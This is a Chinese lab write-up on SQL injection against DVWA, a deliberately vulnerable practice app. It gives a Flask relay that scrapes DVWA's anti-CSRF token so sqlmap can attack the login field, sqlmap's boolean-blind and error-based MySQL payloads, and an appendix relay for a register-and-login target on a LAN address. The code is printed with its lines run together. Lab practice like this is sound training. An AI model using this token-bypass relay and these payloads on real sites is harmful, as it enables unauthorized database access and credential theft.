一、实验过程

 

步骤0：注释掉相关username防护，截图如下：

以DVWA为攻击目标，将login.php中第21、22行注释掉

步骤1：源码分析，截图如下：

如此可知，首先需要通过token验证，然后能进行查询。

1.token验证通过。

这里token用到的函数是dvwaPage.inc.php中调用的

②用户输入账号密码等动作，点击login，是以post方式把请求参数以及user_token=session_token1提交

③服务端接收请求，比较user_token是否等于存储的session_token，如果是则通过，进行下一步动作。

④服务端销毁旧token，生成、存储新的token，并把token附带在响应中返回

重复②~④

---

这就是我们中转页面所做的事情

2. token绕过以后

-->  

然而我们不只是要登录，还要获得尽可能所有人的账户密码，那就还是sqlmap吧~

开爆即可。

步骤2：编写基于Flask框架的中转：

from flask import Flask
from flask import request
import requests
import time
import hashlib
from bs4 import BeautifulSoup
def generate_session_token():# 模拟 PHP 的 uniqid() 函数unique_id = str(time.time())# 使用 md5 哈希算法生成会话令牌session_token = hashlib.md5(unique_id.encode()).hexdigest()print(session_token)return session_token
def custom_fun(payload):# 构造请求头部信息headers = {'Host': '127.0.0.1','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2','Accept-Encoding': 'gzip, deflate','Content-Type': 'application/x-www-form-urlencoded','Origin': 'http://127.0.0.1','Connection': 'close','Referer': 'http://127.0.0.1/DVWA-master/login.php','Cookie': 'security=low; PHPSESSID=ooao2k5lopsqj2trhv42gi7r9i','Upgrade-Insecure-Requests': '1','Sec-Fetch-Dest': 'document','Sec-Fetch-Mode': 'navigate','Sec-Fetch-Site': 'same-origin','Sec-Fetch-User': '?1'}username=payload#获得session_tokenurl = 'http://127.0.0.1/DVWA-master/login.php'session=requests.session()resp=session.get(url=url, headers=headers)# 创建Beautiful Soup对象soup = BeautifulSoup(resp.text, 'html.parser')# 使用find方法找到第一个具有name属性为'user_token'的input标签input_tag = soup.find('input', {'name': 'user_token'})# 获取input标签的value属性值user_token_value = input_tag['value']print(user_token_value)user_token=user_token_value# 构造POST请求的数据data = {'username': username,'password': 'xxxxx','Login': 'Login','user_token': user_token}# print(data)session = requests.session()# 发送POST请求url = 'http://127.0.0.1/DVWA-master/login.php'resp = session.post(url=url, headers=headers ,data=data)    # resp = session.post(url=url,data=data)    resp.encoding = resp.apparent_encoding# print(resp.text)return resp.contentapp = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():if request.method == 'GET':payload = request.args.get('payload')elif  request.method == 'POST':payload = request.form.get('payload')return custom_fun(payload)def main():app.run(host='0.0.0.0', port=5050, debug=True)if __name__ == "__main__":main()

步骤3：SQLmap报告结果，截图如下：

sqlmap identified the following injection point(s) with a total of 465 HTTP(s) requests:

Parameter: payload (GET)

Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: payload=123' RLIKE (SELECT (CASE WHEN (3554=3554) THEN 123 ELSE 0x28 END))-- MmOp

Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: payload=123' AND GTID_SUBSET(CONCAT(0x716b6a7671,(SELECT (ELT(2648=2648,1))),0x716a6b7871),2648)-- qezK

二、注入结果

三、附录

这里把代理中转demo发一下，遇到相关需求，改相应代码和逻辑即可

# demo
from flask import Flask
from flask import request
import requests
import randomdef custom_fun(payload):email = '{}@qq.com'.format(int(random.random() * 10000000))username = payloadpassword = '123'proxy = {'http': '127.0.0.1:8080'}session = requests.session()# 注册burp0_url = "http://192.168.154.130:80/web/register.php"burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/register.php", "Upgrade-Insecure-Requests": "1"}burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)# 登陆burp0_url = "http://192.168.154.130:80/web/login.php"burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/login.php", "Upgrade-Insecure-Requests": "1"}burp0_data = {"email": email, "pw": password, "submit": ''}r1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)# 登陆后跳转到首页burp0_url = "http://192.168.154.130/web/index.php"burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Connection": "close", "Upgrade-Insecure-Requests": "1"}resp = session.get(burp0_url, headers=burp0_headers, proxies=proxy)    resp.encoding = resp.apparent_encodingreturn resp.textapp = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():if request.method == 'GET':payload = request.args.get('payload')elif  request.method == 'POST':payload = request.form.get('payload')return custom_fun(payload)def main():app.run(host='127.0.0.1', debug=True)if __name__ == "__main__":main()